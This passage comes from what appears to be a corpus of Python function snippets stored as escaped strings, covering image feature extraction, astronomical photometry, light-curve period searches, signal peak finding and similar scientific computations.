cv2.COLOR_BGR2GRAY)\r\n\r\n # Extracting Gabor Features\r\n feature_dict = gabor_feature_extractor(image)\r\n\r\n feature_dict['Original'] = image\r\n\r\n entropy_img = entropy(image, disk(1))\r\n feature_dict['Entropy'] = entropy_img\r\n\r\n gaussian3_img = nd.gaussian_filter(image, sigma=3)\r\n feature_dict['Gaussian3'] = gaussian3_img\r\n\r\n gaussian7_img = nd.gaussian_filter(image, sigma=7)\r\n feature_dict['Gaussian7'] = gaussian7_img\r\n\r\n sobel_img = sobel(image)\r\n feature_dict['Sobel'] = sobel_img\r\n\r\n canny_edge_img = cv2.Canny(image, 100, 200)\r\n feature_dict['Canny'] = canny_edge_img\r\n\r\n robert_edge_img = roberts(image)\r\n feature_dict['Robert'] = robert_edge_img\r\n\r\n scharr_edge = scharr(image)\r\n feature_dict['Scharr'] = scharr_edge\r\n\r\n prewitt_edge = prewitt(image)\r\n feature_dict['Prewitt'] = prewitt_edge\r\n\r\n median_img = nd.median_filter(image, size=3)\r\n feature_dict['Median'] = median_img\r\n\r\n variance_img = nd.generic_filter(image, np.var, size=3)\r\n feature_dict['Variance'] = variance_img\r\n\r\n return feature_dict", "def get_stamps(full_image, Args):\n print (\"getting individual stamps\")\n nrows = int(np.ceil(Args.num / Args.num_columns)) # Total number of rows\n out_size = Args.out_size\n low = int(Args.in_size / 2 - out_size / 2)\n high = int(Args.in_size / 2 + out_size / 2)\n nStamp = (nrows, Args.num_columns)\n stampSize = Args.in_size\n s2 = np.hstack(np.split(full_image,nStamp[0])).T.reshape(nStamp[0]*nStamp[1],\n stampSize, stampSize)\n stamps = s2[:, low:high, low:high]\n return stamps", "def getstretchlimits(tiffile):\n im = gdal.Open(tiffile)\n imarray = np.dstack(\n [\n im.GetRasterBand(1).ReadAsArray(),\n im.GetRasterBand(2).ReadAsArray(),\n im.GetRasterBand(3).ReadAsArray(),\n ]\n )\n\n # imarray = imarray[imarray > 10] # get rid of the values near zero\n # return (imarray.dtype, imarray.shape)\n return [np.percentile(imarray, 1), np.percentile(imarray, 99)]", "def get_template_series(self, nb_images):\n\n # Tab for the series of images\n self.template = []\n\n # Tab\n temp = []\n\n # Make current position the zero position\n self.arm.set_to_zero([0, 1, 2])\n self.microscope.set_to_zero([0, 1, 2])\n\n # Take imges only in the template zone\n template = self.template_zone()\n height, width = template.shape[:2]\n\n # Tab of weight to detect where the pipette is\n weight = []\n\n # Detecting the tip\n for i in range(3):\n for j in range(3):\n if (i != 1) & (j != 1):\n # divide template zone into 8 images\n temp = template[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n\n # Search the tip using the number of darkest pixel in the image\n bin_edge, _ = np.histogram(temp.flatten())\n weight += [bin_edge.min()]\n else:\n # image is the center of template zone, do not consider to have functional get_withdraw_sign method\n weight += [-1]\n\n # pipette is in the image with the most darkest pixels\n index = weight.index(max(weight))\n j = index % 3\n i = index // 3\n\n # Update the position of the tip in image\n self.template_loc = [temp.shape[1] * (1 - j / 2.), temp.shape[0] * (1 - i / 2.)]\n\n # Get the series of template images at different height\n for k in range(nb_images):\n self.microscope.absolute_move(k - (nb_images - 1) / 2, 2)\n self.microscope.wait_motor_stop(2)\n time.sleep(1)\n img = self.template_zone()\n height, width = img.shape[:2]\n img = img[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n self.template += [img]\n\n # reset position at the end\n self.go_to_zero()\n pass", "def apply_gaussian(X, sigma):\n return np.array([ndimage.gaussian_filter(x, sigma) for x in X])", "def get_brightest_mean(self, num_pix=3):\n peak_x = np.zeros(\n [len(self.pixel_x)]) # Create blank arrays for peaks\n # rather than a dict (faster)\n peak_y = np.zeros(peak_x.shape)\n peak_amp = np.zeros(peak_x.shape)\n\n # Loop over all tels to take weighted average of pixel\n # positions This loop could maybe be replaced by an array\n # operation by a numpy wizard\n\n tel_num = 0\n for tel in self.image:\n top_index = self.image[tel].argsort()[-1 * num_pix:][::-1]\n print(top_index, self.pixel_x[tel][top_index],\n self.image[tel][top_index])\n weight = self.image[tel][top_index]\n weighted_x = self.pixel_x[tel][top_index] * weight\n weighted_y = self.pixel_y[tel][top_index] * weight\n\n ppx = np.sum(weighted_x) / np.sum(weight)\n ppy = np.sum(weighted_y) / np.sum(weight)\n\n peak_x[tel_num] = ppx # Fill up array\n peak_y[tel_num] = ppy\n peak_amp[tel_num] = np.sum(weight)\n tel_num += 1\n\n self.peak_x = peak_x # * unit # Add to class member\n self.peak_y = peak_y # * unit\n self.peak_amp = peak_amp", "def where_are_gaussians(img):\n list_of_sigmas = [40,30,20,10]\n mask=np.zeros(img.shape,dtype=bool)\n for sigma in list_of_sigmas:\n stack_to_remove,locs=find_gaussian(img.astype(np.uint8),sigma)\n w = stack_to_remove[:,:,0].shape[0]\n a,b=np.ogrid[-w/2:w/2,-w/2:w/2]\n for i in range(stack_to_remove.shape[2]):\n pt=(locs[0][i],locs[1][i])\n mask[pt[0]:pt[0]+w,pt[1]:pt[1]+w] = True\n return mask", "def getHists(img,bins=50):\n hists = np.array([])\n for i in range(3):#Images are loaded as three-dimensional matrices with three channels\n hists = np.append(hists,np.histogram(img[:,:,i], bins, density = True)[0])\n return hists", "def SIP(\n tpfs,\n sigma=5,\n min_period=10,\n max_period=100,\n nperiods=300,\n npca_components=2,\n aperture_threshold=3,\n sff=False,\n sff_kwargs={},\n):\n\n # Get the un-background subtracted data\n if hasattr(tpfs[0], \"flux_bkg\"):\n tpfs_uncorr = [\n (tpf + np.nan_to_num(tpf.flux_bkg))[\n np.isfinite(np.nansum(tpf.flux_bkg, axis=(1, 2)))\n ]\n for tpf in tpfs\n ]\n else:\n tpfs_uncorr = tpfs\n\n apers = [\n tpf.pipeline_mask\n if tpf.pipeline_mask.any()\n else tpf.create_threshold_mask(aperture_threshold)\n for tpf in tpfs_uncorr\n ]\n bkg_apers = [\n (~aper) & (np.nansum(tpf.flux, axis=0) != 0)\n for aper, tpf in zip(apers, tpfs_uncorr)\n ]\n lc = (\n lk.LightCurveCollection(\n [\n tpf.to_lightcurve(aperture_mask=aper)\n for tpf, aper in zip(tpfs_uncorr, apers)\n ]\n )\n .stitch(lambda x: x)\n .normalize()\n )\n lc.flux_err.value[~np.isfinite(lc.flux_err.value)] = np.nanmedian(lc.flux_err.value)\n\n # Run the same routines on the background pixels\n lc_bkg = (\n lk.LightCurveCollection(\n [\n tpf.to_lightcurve(aperture_mask=bkg_aper)\n for tpf, bkg_aper in zip(tpfs_uncorr, bkg_apers)\n ]\n )\n .stitch(lambda x: x)\n .normalize()\n )\n lc_bkg.flux_err.value[~np.isfinite(lc_bkg.flux_err.value)] = np.nanmedian(\n lc_bkg.flux_err.value\n )\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n bkgs = [\n lk.correctors.DesignMatrix(tpf.flux.value[:, bkg_aper], name=\"bkg\")\n .pca(npca_components)\n .append_constant()\n .to_sparse()\n for tpf, bkg_aper in zip(tpfs_uncorr, bkg_apers)\n ]\n for bkg in bkgs:\n bkg.prior_mu[-1] = 1\n bkg.prior_sigma[-1] = 0.1\n\n bkg.prior_mu[:-1] = 0\n bkg.prior_sigma[:-1] = 0.1\n\n # Split at the datadownlink\n bkgs = [\n bkg.split(list((np.where(np.diff(tpf.time.jd) > 0.3)[0] + 1)))\n for bkg, tpf in zip(bkgs, tpfs_uncorr)\n ]\n systematics_dm = vstack(bkgs)\n\n sigma_f_inv = sparse.csr_matrix(1 / lc.flux_err.value[:, None] ** 2)\n\n def fit_model(lc, mask=None, return_model=False):\n if mask is None:\n mask = np.ones(len(lc.flux.value), bool)\n sigma_w_inv = dm.X[mask].T.dot(dm.X[mask].multiply(sigma_f_inv[mask])).toarray()\n sigma_w_inv += np.diag(1.0 / dm.prior_sigma ** 2)\n\n B = dm.X[mask].T.dot((lc.flux.value[mask] / lc.flux_err.value[mask] ** 2))\n B += dm.prior_mu / dm.prior_sigma ** 2\n w = np.linalg.solve(sigma_w_inv, B)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n werr = ((np.linalg.inv(sigma_w_inv)) ** 0.5).diagonal()\n if return_model:\n return dm.X.dot(w)\n return w, werr\n\n # Make a dummy design matrix\n period = 27\n ls_dm = lk.correctors.DesignMatrix(\n lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / period, bias=False, nterms=1\n ),\n name=\"LS\",\n ).to_sparse()\n dm = lk.correctors.SparseDesignMatrixCollection(\n [systematics_dm, ls_dm]\n ).to_designmatrix(name=\"design_matrix\")\n\n if sff:\n sff_dm = []\n for tpf in tpfs_uncorr:\n s = lk.correctors.SFFCorrector(tpf.to_lightcurve())\n _ = s.correct(**sff_kwargs)\n sff_dm.append(s.dmc[\"sff\"].to_sparse())\n sff_dm = vstack(sff_dm)\n dm = lk.correctors.SparseDesignMatrixCollection([dm, sff_dm]).to_designmatrix(\n name=\"design_matrix\"\n )\n\n # Do a first pass at 27 days, just to find ridiculous outliers\n mod = fit_model(lc, return_model=True)\n mask = ~(lc - mod * lc.flux.unit).remove_outliers(return_mask=True, sigma=sigma)[1]\n\n # Loop over some periods we care about\n periods = 1 / np.linspace(1 / min_period, 1 / max_period, nperiods)\n ws = np.zeros((len(periods), dm.X.shape[1]))\n ws_err = np.zeros((len(periods), dm.X.shape[1]))\n ws_bkg = np.zeros((len(periods), dm.X.shape[1]))\n ws_err_bkg = np.zeros((len(periods), dm.X.shape[1]))\n\n for idx, period in enumerate(tqdm(periods, desc=\"Running pixels in aperture\")):\n dm.X[:, -ls_dm.shape[1] :] = lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / period, bias=False, nterms=1\n )\n ws[idx], ws_err[idx] = fit_model(lc, mask=mask)\n ws_bkg[idx], ws_err_bkg[idx] = fit_model(lc_bkg, mask=mask)\n power = (ws[:, -2] ** 2 + ws[:, -1] ** 2) ** 0.5\n am = np.argmax(power)\n dm.X[:, -ls_dm.shape[1] :] = lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / periods[am], bias=False, nterms=1\n )\n mod = dm.X[:, :-2].dot(ws[am][:-2])\n\n power_bkg = (ws_bkg[:, -2] ** 2 + ws_bkg[:, -1] ** 2) ** 0.5\n\n r = {\n \"periods\": periods,\n \"power\": power,\n \"raw_lc\": lc,\n \"power_bkg\": power_bkg,\n \"raw_lc_bkg\": lc_bkg,\n \"corr_lc\": lc - mod * lc.flux.unit + 1,\n \"period_at_max_power\": periods[am],\n }\n\n return r", "def _compute_stack_mean_and_uncertainty(self, starMask, iters=5,\n backgroundClipSigma=5.0, starClipSigma=40.0):\n # Extract the number of images (nz) and the shape of the images (ny, nx)\n nz, ny, nx = self.shape\n\n # Test for the number of bits in each pixel (or just assum 64 bits)\n bitsPerPixel = 64\n\n # Compute the number of rows to process at a given time\n numberOfRows, numSections = self._get_number_of_rows_to_process(bitsPerPixel)\n print('Processing stack in {0} sections of {1} rows'.format(\n numSections, numberOfRows))\n\n # Compute the sigma-clipping starting points and increments\n tmp = self._get_sigma_clip_start_and_steps(\n iters=iters,\n backgroundClipSigma=backgroundClipSigma,\n starClipSigma=starClipSigma\n )\n backgroundClipStart, backgroundClipStep, starClipStart, starClipStep = tmp\n\n # Initalize an empty array to hold the output\n outMean = np.zeros((ny, nx))\n outUncert = np.zeros((ny, nx))\n\n for sectionNumber in range(numSections):\n print('Starting section number {0}'.format(sectionNumber+ 1 ))\n # Compute the range of rows to extract\n startRow, endRow = self._get_start_and_end_rows(\n sectionNumber, numberOfRows\n )\n\n # Extract the data for this section\n dataSubStack = self._extract_data_sub_stack(startRow, endRow)\n\n # Extract the uncertainty for this section\n uncertSubStack = self._extract_uncert_sub_stack(startRow, endRow)\n\n # Extract the starSubMask for this section\n if issubclass(type(starMask), np.ndarray):\n starSubMask = starMask[startRow:endRow, :]\n elif issubclass(type(starMask), bool):\n starSubMask = starMask\n\n # Build the bad pixel mask for this subStack\n dataSubStack = self._construct_sub_stack_bad_pixel_mask(\n dataSubStack,\n starSubMask,\n iters=iters,\n backgroundClipStart=backgroundClipStart,\n backgroundClipStep=backgroundClipStep,\n starClipStart=starClipStart,\n starClipStep=starClipStep\n )\n\n # Compute the mean and uncertainty of the masked array\n mean, uncert = self._compute_masked_mean_and_uncertainty(\n dataSubStack, uncertSubStack)\n\n # Store the result in the output\n outMean[startRow:endRow, :] = mean\n outUncert[startRow:endRow, :] = uncert\n\n return outMean, outUncert", "def autoExtract(array):#Extract signal from a 1D-array\n \n derivmax = medianFilter(derivation(array)).argmax()\n derivmin = medianFilter(derivation(array)).argmin()\n i = 0\n extraction = []\n while i < len(array) or i <= 300:\n if i >= derivmax and i <= derivmin:\n extraction.append(array[i])\n i = i+1\n extraction = np.array(extraction)\n derivmax = derivmax\n derivmin = derivmin\n return extraction", "def array_to_spiketrains(array, bin_size):\n stList = []\n for trial in range(len(array)):\n trialList = []\n for channel in range(array.shape[2]):\n times = np.nonzero(array[trial, :, channel])[0]\n counts = array[trial, times, channel].astype(int)\n times = np.repeat(times, counts)\n st = neo.SpikeTrain(times*bin_size*pq.ms, t_stop=array.shape[1]*bin_size*pq.ms)\n trialList.append(st)\n stList.append(trialList)\n return stList", "def _random_jitter(self, sampling_results, img_metas, amplitude=0.15):\n for sampling_result, img_meta in zip(sampling_results, img_metas):\n bboxes = sampling_result.pos_bboxes\n random_offsets = bboxes.new_empty(bboxes.shape[0], 4).uniform_(\n -amplitude, amplitude)\n # before jittering\n cxcy = (bboxes[:, 2:4] + bboxes[:, :2]) / 2\n wh = (bboxes[:, 2:4] - bboxes[:, :2]).abs()\n # after jittering\n new_cxcy = cxcy + wh * random_offsets[:, :2]\n new_wh = wh * (1 + random_offsets[:, 2:])\n # xywh to xyxy\n new_x1y1 = (new_cxcy - new_wh / 2)\n new_x2y2 = (new_cxcy + new_wh / 2)\n new_bboxes = torch.cat([new_x1y1, new_x2y2], dim=1)\n # clip bboxes\n max_shape = img_meta['img_shape']\n if max_shape is not None:\n new_bboxes[:, 0::2].clamp_(min=0, max=max_shape[1] - 1)\n new_bboxes[:, 1::2].clamp_(min=0, max=max_shape[0] - 1)\n\n sampling_result.pos_bboxes = new_bboxes\n return sampling_results", "def FAP_dist(peak_amps, Nbins=1000):\n zmin = np.linspace(0, peak_amps.max(), Nbins)\n FAP = np.zeros(Nbins)\n for i in range(Nbins):\n FAP[i] = (peak_amps > zmin[i]).sum()\n FAP /= peak_amps.shape[0] # Normalize\n return zmin, FAP", "def get_peaks(self, spectrum, amplitude):\n peaks = []\n average_noise_level = self._get_average_noise_level(amplitude)\n\n for i, a in enumerate(amplitude):\n noise = next(average_noise_level)\n\n if a / noise > self.threshold and self._is_max(amplitude[i-1], a, amplitude[i+1]):\n peaks.append(tuple([spectrum[i], a, noise]))\n\n peaks.sort(reverse=True, key=lambda x: x[1] / x[2])\n \n if len(peaks) > self.peaks_arr_size:\n del peaks[self.sample_arr_size:]\n\n return peaks", "def testStatisticsRamp(self):\n\n \n nx = 101\n ny = 64\n img = afwImage.ImageF(afwGeom.Extent2I(nx, ny))\n \n z0 = 10.0\n dzdx = 1.0\n mean = z0 + (nx/2)*dzdx\n stdev = 0.0\n for y in range(ny):\n for x in range(nx):\n z = z0 + dzdx*x\n img.set(x, y, z)\n stdev += (z - mean)*(z - mean)\n\n stdev = math.sqrt(stdev/(nx*ny - 1))\n \n stats = afwMath.makeStatistics(img, afwMath.NPOINT | afwMath.STDEV | afwMath.MEAN)\n testmean = stats.getValue(afwMath.MEAN)\n teststdev = stats.getValue(afwMath.STDEV)\n \n self.assertEqual(stats.getValue(afwMath.NPOINT), nx*ny)\n self.assertEqual(testmean, mean)\n self.assertEqual(teststdev, stdev )\n \n stats = afwMath.makeStatistics(img, afwMath.STDEV | afwMath.MEAN | afwMath.ERRORS)\n mean, meanErr = stats.getResult(afwMath.MEAN)\n sd = stats.getValue(afwMath.STDEV)\n \n self.assertEqual(mean, img.get(nx/2, ny/2))\n self.assertEqual(meanErr, sd/math.sqrt(img.getWidth()*img.getHeight()))\n \n # ===============================================================================\n # sjb code for percentiles and clipped stats\n \n stats = afwMath.makeStatistics(img, afwMath.MEDIAN)\n self.assertEqual(z0 + dzdx*(nx - 1)/2.0, stats.getValue(afwMath.MEDIAN))\n \n stats = afwMath.makeStatistics(img, afwMath.IQRANGE)\n self.assertEqual(dzdx*(nx - 1)/2.0, stats.getValue(afwMath.IQRANGE))\n \n stats = afwMath.makeStatistics(img, afwMath.MEANCLIP)\n self.assertEqual(z0 + dzdx*(nx - 1)/2.0, stats.getValue(afwMath.MEANCLIP))", "def skystats(stamp):\n\t\n\tif isinstance(stamp, galsim.Image):\n\t\ta = stamp.array\n\t\t# Normally there should be a .transpose() here, to get the orientation right.\n\t\t# But in the present case it doesn't change anything, and we can skip it.\n\telse:\n\t\ta = stamp # Then we assume that it's simply a numpy array.\n\t\n\tedgepixels = np.concatenate([\n\t\t\ta[0,1:], # left\n\t\t\ta[-1,1:], # right\n\t\t\ta[:,0], # bottom\n\t\t\ta[1:-1,-1] # top\n\t\t\t])\n\tassert len(edgepixels) == 2*(a.shape[0]-1) + 2*(a.shape[0]-1)\n\n\t# And we convert the mad into an estimate of the Gaussian std:\n\treturn {\n\t\t\"std\":np.std(edgepixels), \"mad\": 1.4826 * mad(edgepixels),\n\t\t\"mean\":np.mean(edgepixels), \"med\":np.median(edgepixels),\n\t\t\"stampsum\":np.sum(a)\n\t\t}", "def get_mean_in_time(trajectories, nb_bins=15, freq_range=[0.4, 0.6]):\n # Create bins and select trajectories going through the freq_range\n time_bins = np.linspace(-950, 2000, nb_bins)\n trajectories = [traj for traj in trajectories if np.sum(np.logical_and(\n traj.frequencies >= freq_range[0], traj.frequencies < freq_range[1]), dtype=bool)]\n\n # Offset trajectories to set t=0 at the point they are seen in the freq_range and adds all the frequencies / times\n # to arrays for later computation of mean\n t_traj = np.array([])\n f_traj = np.array([])\n for traj in trajectories:\n idx = np.where(np.logical_and(traj.frequencies >=\n freq_range[0], traj.frequencies < freq_range[1]))[0][0]\n traj.t = traj.t - traj.t[idx]\n t_traj = np.concatenate((t_traj, traj.t))\n f_traj = np.concatenate((f_traj, traj.frequencies))\n\n # Binning of all the data in the time bins\n filtered_fixed = [traj for traj in trajectories if traj.fixation == \"fixed\"]\n filtered_lost = [traj for traj in trajectories if traj.fixation == \"lost\"]\n freqs, fixed, lost = [], [], []\n for ii in range(len(time_bins) - 1):\n freqs = freqs + [f_traj[np.logical_and(t_traj >= time_bins[ii], t_traj < time_bins[ii + 1])]]\n fixed = fixed + [len([traj for traj in filtered_fixed if traj.t[-1] < time_bins[ii]])]\n lost = lost + [len([traj for traj in filtered_lost if traj.t[-1] < time_bins[ii]])]\n\n # Computation of the mean in each bin, active trajectories contribute their current frequency,\n # fixed contribute1 and lost contribute 0\n mean = []\n for ii in range(len(freqs)):\n mean = mean + [np.sum(freqs[ii]) + fixed[ii]]\n mean[-1] /= (len(freqs[ii]) + fixed[ii] + lost[ii])\n\n nb_active = [len(freq) for freq in freqs]\n nb_dead = [fixed[ii] + lost[ii] for ii in range(len(fixed))]\n\n return 0.5 * (time_bins[1:] + time_bins[:-1]), mean, nb_active, nb_dead", "def process_tir_image(ds, data_res, t_thresh=-50, min_mcs_size=5000):\n ctt = (ds['tb']).squeeze()-273.15\n min_pix_nb = min_mcs_size / data_res**2\n\n max_pix_nb = 300000 / data_res**2 # this is to capture satellite artefacts that come in large contiguous stripes.\n labels, goodinds = mcs_define(ctt.values, t_thresh, minmax_area=[min_pix_nb, max_pix_nb]) # 7.7x7.7km = 64km2 per pix in gridsat? 83 pix is 5000km2\n dic = dictionary()\n #plt.figure()\n #plt.pcolormesh(labels)\n #plt.colorbar()\n #plt.show()\n for g in goodinds:\n\n if g==0:\n continue\n\n pos = np.where(labels==g)\n npos = np.where(labels!=g)\n datestr = str(int(ctt['time.year'].values))+'-'+str(int(ctt['time.month'].values)).zfill(2)+'-'+str(int(ctt['time.day'].values)).zfill(2)+'_'+\\\n str(int(ctt['time.hour'].values)).zfill(2)+':'+str(int(ctt['time.minute'].values)).zfill(2)\n \n dic['date'].append(datestr)\n dic['month'].append(int(ctt['time.month']))\n dic['hour'].append(int(ctt['time.hour']))\n dic['year'].append(int(ctt['time.year']))\n dic['day'].append(int(ctt['time.day']))\n dic['minute'].append(int(ctt['time.minute']))\n\n storm = ctt.copy()\n storm.values[npos] = np.nan\n tmin_pos = np.nanargmin(storm.values)\n tpos_2d = np.unravel_index(tmin_pos, storm.shape)\n \n latmin = np.nanmin(ctt.lat.values[pos[0]])\n latmax = np.nanmax(ctt.lat.values[pos[0]])\n lonmin = np.nanmin(ctt.lon.values[pos[1]])\n lonmax = np.nanmax(ctt.lon.values[pos[1]])\n dic['area'].append(np.sum(np.isfinite(storm.values))*data_res**2)\n dic['70area'].append(np.sum(storm.values<=-70)*data_res**2)\n dic['minlon'].append(lonmin)\n dic['minlat'].append(latmin)\n dic['maxlon'].append(lonmax)\n dic['maxlat'].append(latmax)\n dic['clon'].append(lonmin + (lonmax - lonmin)/2)\n dic['clat'].append(latmin + (latmax - latmin)/2)\n dic['tmin'].append(np.nanmin(storm))\n dic['tminlat'].append(float(ctt.lat[tpos_2d[0]].values))\n dic['tminlon'].append(float(ctt.lon[tpos_2d[1]].values))\n dic['tmean'].append(float(np.nanmean(storm)))\n dic['tp1'].append(float(np.nanpercentile(storm, 1)))\n dic['tp99'].append(float(np.nanpercentile(storm, 99)))\n dic['stormID'].append(datestr + '_' + str(g))\n dic['cloudMask'].append(labels==g)\n dic['tir'].append(storm.values)\n\n # for k in dic.keys():\n # print(k, len(dic[k]))\n return dic", "def spectrum_multi_taper(self):\r\n if np.iscomplexobj(self.input.data):\r\n psd_len = self.input.shape[-1] \r\n dt = complex\r\n else:\r\n psd_len = self.input.shape[-1] / 2 + 1\r\n dt = float\r\n\r\n #Initialize the output\r\n spectrum_multi_taper = np.empty((self.input.shape[:-1] + (psd_len,)),\r\n dtype=dt)\r\n\r\n #If multi-channel data:\r\n if len(self.input.data.shape) > 1:\r\n for i in range(self.input.data.shape[0]):\r\n # 'f' are the center frequencies of the frequency bands\r\n # represented in the MT psd. These are identical in each\r\n # iteration of the loop, so they get reassigned into the same\r\n # variable in each iteration:\r\n f, spectrum_multi_taper[i], _ = tsa.multi_taper_psd(\r\n self.input.data[i],\r\n Fs=self.input.sampling_rate,\r\n BW=self.BW,\r\n adaptive=self.adaptive,\r\n low_bias=self.low_bias)\r\n else:\r\n f, spectrum_multi_taper, _ = tsa.multi_taper_psd(self.input.data,\r\n Fs=self.input.sampling_rate,\r\n BW=self.BW,\r\n adaptive=self.adaptive,\r\n low_bias=self.low_bias)\r\n\r\n return f, spectrum_multi_taper", "def filter_gaps(msa_obj, gap_cutoff=0.5):\n # msa must be a list\n import numpy as np\n alphabet = \"ARNDCQEGHILKMFPSTWYV-\"\n states = len(alphabet)\n tmp = (msa_obj == states - 1).astype(np.float)\n non_gaps = np.where(np.sum(tmp.T, -1).T / msa_obj.shape[0] < gap_cutoff)[0]\n return msa_obj[:, non_gaps], non_gaps", "def n_finder(gt_mat, x, eps):\n numsnps = int(0.9*gt_mat.shape[0])\n assert(x < numsnps)\n assert(eps > 0 and eps<= 1.0)\n indices = np.random.choice(numsnps, size=x, replace=False)\n n = 0\n avg_array = np.zeros(gt_mat.shape[0])\n going = True\n while going:\n r2_list = [np.corrcoef(gt_mat[i,:],gt_mat[i+n,:])[0,1]**2 for i in indices]\n avg_array[n] = np.nanmean(r2_list)\n n += 1\n if np.mean(r2_list) < eps:\n going = False \n return n,avg_array[:n]", "def estimate_peaks(samples, thresh=0.02):\n pks = find_peaks(samples, prominence=thresh)\n npks = np.ones(len(samples), dtype=bool)\n npks[pks[0]] = False\n return np.mean(samples[pks[0]])/np.mean(samples[npks]), len(pks[0])", "def aperphot(fn, timekey=None, pos=[0,0], dap=[2,4,6], mask=None, verbose=False, nanval=999, resamp=None, retfull=False):\n # 2009-09-14 10:49 IJC: Created\n # 2010-01-15 14:20 IJC: Added numpy \"_string\" check\n # 2011-12-29 12:01 IJMC: Added peak pixel values to photometry report.\n # 2012-01-25 11:26 IJMC: Adding \"resamp\" option -- thanks to\n # K. Stevenson and J. Harrington of UCF for\n # the suggestion.\n # 2012-02-26 11:53 IJMC: Now return 'ntarg' and 'nsky' -- number of pixels used.\n # 2012-06-07 08:27 IJMC: 'peak' values are now corrected for the\n # resampling factor.\n # 2012-07-03 10:35 IJMC: Fixed a key bug: frames were not\n # correctly background-subtracted when\n # applying partial-pixel resampling.\n # 2012-10-19 13:41 IJMC: Documented 'retfull' option; changed default.\n # 2013-03-20 09:21 IJMC: More error-checking for saving header\n # keywords. Thanks to A. Weigel @\n # ETH-Zurich for catching this!\n\n from numpy import meshgrid, median,isfinite,sort,ndarray,string_\n import numpy as np\n import pyfits\n #from analysis import fixval\n from os import path\n from scipy import interpolate\n\n thisobs = phot()\n x0, y0 = pos\n dap_targ, dap_skyinner, dap_skyouter = dap\n if resamp is None or resamp<1:\n resamp = 1\n else:\n resamp = float(resamp)\n \n # Determine size:\n if isinstance(fn,str):\n nx = pyfits.getval(fn, 'NAXIS1')\n ny = pyfits.getval(fn, 'NAXIS2')\n elif isinstance(fn,ndarray):\n nx,ny = fn.shape\n\n nx0, ny0 = nx, ny\n nx = ((nx - 1)*resamp + 1.) # Avoid resampling at pixel locations\n ny = ((ny - 1)*resamp + 1.) # outside the original boundaries.\n\n # Generate or load masks:\n if mask==None:\n xx,yy = meshgrid(np.arange(ny)/resamp, np.arange(nx)/resamp)\n mask_targ = makemask(xx, yy, (x0, y0, dap_targ))\n mask_s1 = makemask(xx, yy, (x0,y0, dap_skyinner))\n mask_s2 = makemask(xx, yy, (x0,y0, dap_skyouter))\n mask_sky = mask_s2 - mask_s1\n else:\n mask_targ = mask==1\n mask_sky = mask==2\n if resamp>1:\n print \"In aperphot, resamp>1 and user-specified mask passed in... beware!\"\n\n # Load data frame:\n thisobs = phot()\n if isinstance(fn,ndarray):\n frame = fn\n elif isinstance(fn, str) or isinstance(fn,string_):\n if not path.isfile(fn):\n print \"file %s not found! exiting...\" % fn\n return thisobs\n frame = pyfits.getdata(fn)\n fixval(frame, nanval)\n\n # Resample data frame\n if resamp>1:\n frame0 = frame.copy()\n xx0 = range(nx0)\n yy0 = range(ny0)\n x1,y1 = np.arange(nx)/resamp, np.arange(ny)/resamp\n rectspline = interpolate.fitpack2.RectBivariateSpline(xx0, yy0, frame0, kx=1, ky=1, s=0)\n frame = rectspline(x1, y1)\n\n #from pylab import *\n #pdb.set_trace()\n # Measure background and aperture photometry\n thisbg, thisebg = estbg(frame, mask=mask_sky, plotalot=verbose, rout=[3,99])\n thisphot = (mask_targ*(frame - thisbg)).sum() /resamp/resamp\n peak = frame.max()\n peak_targ = (mask_targ * frame).max()\n peak_annulus = (mask_sky * frame).max()\n\n thisobs.bg=thisbg\n thisobs.ebg=thisebg\n thisobs.bgstr='phot.estbg: SDOM on bg histogram mean & dispersion after outlier rejection'\n thisobs.phot=thisphot\n thisobs.photstr='by-hand background-subtracted aperture photometry'\n thisobs.ntarg = mask_targ.sum()/resamp/resamp\n thisobs.nsky = mask_sky.sum()/resamp/resamp\n\n thisobs.peak = peak\n thisobs.peak_targ = peak_targ\n thisobs.peak_annulus = peak_annulus\n thisobs.peakstr = 'peak pixel value in frame'\n thisobs.peak_targstr = 'peak pixel value in target aperture'\n thisobs.peak_annulusstr = 'peak pixel value in sky annulus'\n thisobs.position = pos\n thisobs.positionstr = 'user-specified, zero-indexed pixel coordinates.'\n if isinstance(fn, str):\n header = pyfits.getheader(fn)\n if not timekey==None:\n if timekey in header: \n thisobs.time=header['timekey']\n thisobs.timestr='heliocentric modified julian date'\n if 'object' in header: thisobs.object = header['object']\n if 'exptime' in header: thisobs.exptime = header['exptime']\n thisobs.aper = dap\n thisobs.aperstr = 'target, inner, outer aperture diameters, in pixels.'\n thisobs.filename=fn\n thisobs.resamp = resamp\n if retfull:\n thisobs.mask_targ = mask_targ\n thisobs.mask_sky = mask_sky\n thisobs.frame = frame\n\n if verbose:\n from pylab import figure, colorbar\n from nsdata import imshow\n figure(); imshow(frame*mask_targ); colorbar()\n figure(); imshow(frame*mask_sky); colorbar()\n\n return thisobs", "def calc_tsunami(slip_result):\n gf = h5py.File('NA_CAS.hdf5', 'r')\n time_array = np.array(gf['time/timedata'])\n\n # dictionary for holding slip calculations\n scale_gf = []\n\n # declare empty array with max size\n ar_len = len(time_array)\n ar_width = get_array_size()\n\n tgf = np.zeros(shape=(ar_len, ar_width)) # tgf = tsunami green's function\n\n # loop over index adn slip value from slip array\n for i, slip in enumerate(slip_result):\n # print(i)\n # make sure slip is a float not string\n s = float(slip)\n\n # multiply slip by each subfault\n scale_gf.append(s * gf['GF/{:03}'.format(i)][:])\n\n # iterate over all the subfaults and add all subfaults together per site\n for sf in scale_gf:\n tgf += sf\n\n # return the slip_at_site array and the time array\n return (tgf, time_array)", "def combined_gaussian(amps, fwhms, means, x):\n if len(amps) > 0.:\n for i in range(len(amps)):\n gauss = gaussian(amps[i], fwhms[i], means[i], x)\n if i == 0:\n combined_gauss = gauss\n else:\n combined_gauss += gauss\n else:\n combined_gauss = np.zeros(len(x))\n return combined_gauss", "def sim_hits(tmat,start_list,targ_list,ntraj = 1000, cutoff=1000):\n \n # get state names\n nstates = tmat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n trajs = list()\n \n for ii in range(ntraj):\n curr = choice(start_list)\n traj = list()\n traj.append(curr)\n while curr not in targ_list:\n weights = copy(tmat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n traj.append(curr)\n \n 